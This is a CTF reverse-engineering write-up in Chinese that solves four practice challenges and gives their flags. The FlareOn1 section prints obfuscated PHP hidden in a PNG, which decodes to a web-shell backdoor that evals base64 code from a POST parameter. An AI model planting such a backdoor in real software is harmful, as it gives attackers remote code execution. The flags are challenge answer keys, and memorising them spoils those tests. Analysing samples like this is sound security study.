REVERSE-PRACTICE-BUUCTF-25

特殊的 BASE64

exe程序,运行后输入,无壳,ida分析
main函数,读取输入,进行变表base64编码,与rightFlag比较验证
base64-logic
在字符串窗口找到变表
base64-table
用工具解base64即可得到flag
base64-flag

[FlareOn1]Javascrap

html文件什么都得不到
用010 editor打开那个png文件,在文件最后隐写了php代码

<?php 
$terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");
$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 
27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);
// Decoder stage: each entry of $order is an index into the $terms character
// table; appending $terms[$order[$i]] in sequence rebuilds the hidden PHP source.
$do_me="";
for($i=0;$i<count($order);$i++)
{$do_me=$do_me.$terms[$order[$i]];}
// eval() runs the rebuilt string as PHP code. When analysing the sample, print
// $do_me instead of evaluating it (the write-up swaps eval for echo) so the
// next stage is only displayed, never executed.
eval($do_me); 
?>

把最后的eval改成echo(只打印解码出的代码,不执行),找个php在线工具或隔离环境执行一下,打印结果如下

// Second stage, shown as printed by the echo (the \' sequences come from that output).
// $_ is base64 text. Decoded, it starts with if(isset($_POST["\97\49\49...
// and contains eval(base64_decode($_POST["\97\49\x31...: the body of a request
// parameter is base64-decoded and evaluated. The parameter name is written
// as numeric character escapes.
$_=\'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\';
// $__ is base64 for: $code=base64_decode($_);eval($code);
$__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\';
// The mixed hex/octal escapes spell the function name "base64_decode".
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
// Calls base64_decode($__) and evaluates the result, which in turn decodes and
// evaluates $_. For analysis, decode the strings offline rather than running this line.
eval($___($__));

将第一个字符串$_解base64
js-debase64
将\97\49\x31开始的数据抠出来,转成字符串,再把DOT、AT、DASH分别替换为“.”、“@”、“-”,即为flag

# Character codes copied from the "\97\49\x31..." escape run in the decoded PHP.
# Following the write-up, bare numbers are taken as decimal and \x.. values as hex.
data = [
    97, 49, 0x31, 68, 0x4f, 0x54, 116, 104, 0x61, 116,
    0x44, 79, 0x54, 106, 97, 118, 97, 53, 0x63, 114,
    0x61, 0x70, 65, 84, 102, 0x6c, 0x61, 114, 101, 0x44,
    65, 0x53, 72, 111, 0x6e, 0x44, 0x4f, 84, 99, 0x6f,
    0x6d,
]

# Every code is 7-bit ASCII, so the list can be decoded in one step.
decoded = bytes(data).decode('ascii')
print(decoded)
# Printed string:
# a11DOTthatDOTjava5crapATflareDASHonDOTcom
# After replacing DOT / AT / DASH by hand:
# a11.that.java5crap@flare-on.com

[WMCTF2020]easy_re

exe程序,perl语言写的,ida看不出什么东西
上x64dbg,F8单步调试,运行到这里时可以看到代码
(直接搜索字符串"script",可以找到解压call,下断后F9,也可看到代码)
将输入与已定义的flag比较,直接交flag即可
easyre-code

# Script text as it appears in the debugger once the packed Perl program has been
# unpacked in memory. NOTE(review): the \" and doubled {{ }} look like escaping
# artifacts of the dump rather than Perl syntax - confirm against the binary.
# The expected flag is a hard-coded literal, so anyone who can read the unpacked
# script can read the secret.
$flag = \"WMCTF{{I_WAnt_dynam1c_F1ag}}\";
print \"please input the flag:\";
# Read one line from standard input and strip the trailing newline.
$line = <STDIN>;
chomp($line);
# Plain string equality against the stored literal decides the result.
if($line eq $flag)
{{print \"congratulation!\"}}
else
{{print \"no,wrong\"}}

[NPUCTF2020]BasicASM

汇编代码,主要的逻辑为
读取输入,输入的下标为奇数时,输入的内容异或0x42,下标为偶数时不变
将变换后的输入转成十六进制输出

// Excerpt of main: loops over the string "flag" with the index kept at [rbp+64h].
// The branch shown handles odd indexes: the character is XORed with 42h, stored in p,
// and the stream manipulators setfill('0'), setw(2) and std::hex are prepared for cout.
// The jne target for even indexes and the loop exit lie outside this excerpt.
00007FF7A8AC5A92  lea         rcx,[flag]  
00007FF7A8AC5A96  call        std::basic_string<char,std::char_traits<char>,std::allocator<char> >::basic_string<char,std::char_traits<char>,std::allocator<char> > (07FF7A8AC15E1h)  
00007FF7A8AC5A9B  nop  
00007FF7A8AC5A9C  mov         dword ptr [p],0				// p = 0
00007FF7A8AC5AA3  mov         dword ptr [rbp+64h],0			// loop index i at [rbp+64h] = 0
00007FF7A8AC5AAA  jmp         main+64h (07FF7A8AC5AB4h)  
00007FF7A8AC5AAC  mov         eax,dword ptr [rbp+64h]  
00007FF7A8AC5AAF  inc         eax  
00007FF7A8AC5AB1  mov         dword ptr [rbp+64h],eax		// i = i + 1 (loop increment)
00007FF7A8AC5AB4  movsxd      rax,dword ptr [rbp+64h]  
00007FF7A8AC5AB8  mov         qword ptr [rbp+1F8h],rax		// [rbp+1F8h] = i, sign-extended to 64 bits
00007FF7A8AC5ABF  lea         rcx,[flag]  
00007FF7A8AC5AC3  call        std::basic_string<char,std::char_traits<char>,std::allocator<char> >::length (07FF7A8AC122Bh)  
00007FF7A8AC5AC8  mov         rcx,qword ptr [rbp+1F8h]		// rcx = i
00007FF7A8AC5ACF  cmp         rcx,rax						// rax = value returned by length()
00007FF7A8AC5AD2  jae         main+1B2h (07FF7A8AC5C02h)  // leave the loop when i >= length
00007FF7A8AC5AD8  mov         eax,dword ptr [rbp+64h]		// eax = i
00007FF7A8AC5ADB  and         eax,1							// eax = i & 1
00007FF7A8AC5ADE  cmp         eax,1							// is the index odd?
00007FF7A8AC5AE1  jne         main+126h (07FF7A8AC5B76h)  // even index: take the other branch
00007FF7A8AC5AE7  movsxd      rax,dword ptr [rbp+64h]		// rax = i
00007FF7A8AC5AEB  mov         rdx,rax  
00007FF7A8AC5AEE  lea         rcx,[flag]  
00007FF7A8AC5AF2  call        std::basic_string<char,std::char_traits<char>,std::allocator<char> >::operator[] (07FF7A8AC1442h)  
00007FF7A8AC5AF7  movsx       eax,byte ptr [rax]			// eax = flag[i], sign-extended byte
00007FF7A8AC5AFA  xor         eax,42h						// eax ^= 0x42
00007FF7A8AC5AFD  mov         dword ptr [p],eax				// p = eax
00007FF7A8AC5B00  mov         dl,30h  // fill character '0' (30h) for std::setfill
00007FF7A8AC5B02  lea         rcx,[rbp+144h]  
00007FF7A8AC5B09  call        std::setfill<char> (07FF7A8AC1046h)  
00007FF7A8AC5B0E  mov         qword ptr [rbp+1F8h],rax  
00007FF7A8AC5B15  mov         edx,2  // field width 2 for std::setw
00007FF7A8AC5B1A  lea         rcx,[rbp+168h]  
00007FF7A8AC5B21  call        std::setw (07FF7A8AC10D2h)  
00007FF7A8AC5B26  mov         qword ptr [rbp+200h],rax  
00007FF7A8AC5B2D  lea         rdx,[std::hex (07FF7A8AC1488h)]// std::hex manipulator: hexadecimal output  
00007FF7A8AC5B34  mov         rcx,qword ptr [__imp_std::cout (07FF7A8AD71C0h)]  
00007FF7A8AC5B3B  call        qword ptr [__imp_std::basic_ostream<char,std::char_traits<char> >::operator<< (07FF7A8AD7160h)] // stream insertion into std::cout (output)

由输出的十六进制字串写脚本即可得到flag

# Hex string printed by the program: two hex digits per transformed input byte.
res = "662e61257b26301d7972751d6b2c6f355f3a38742d74341d61776d7d7d"

# Turn the hex text back into a list of byte values.
data = list(bytes.fromhex(res))

# The program XORs only the characters at odd indexes with 0x42; XOR is its own
# inverse, so applying it again to those positions restores the input.
data = [value ^ 0x42 if pos % 2 == 1 else value for pos, value in enumerate(data)]

print(bytes(data).decode('ascii'))
#flag{d0_y0u_know_x86-64_a5m?}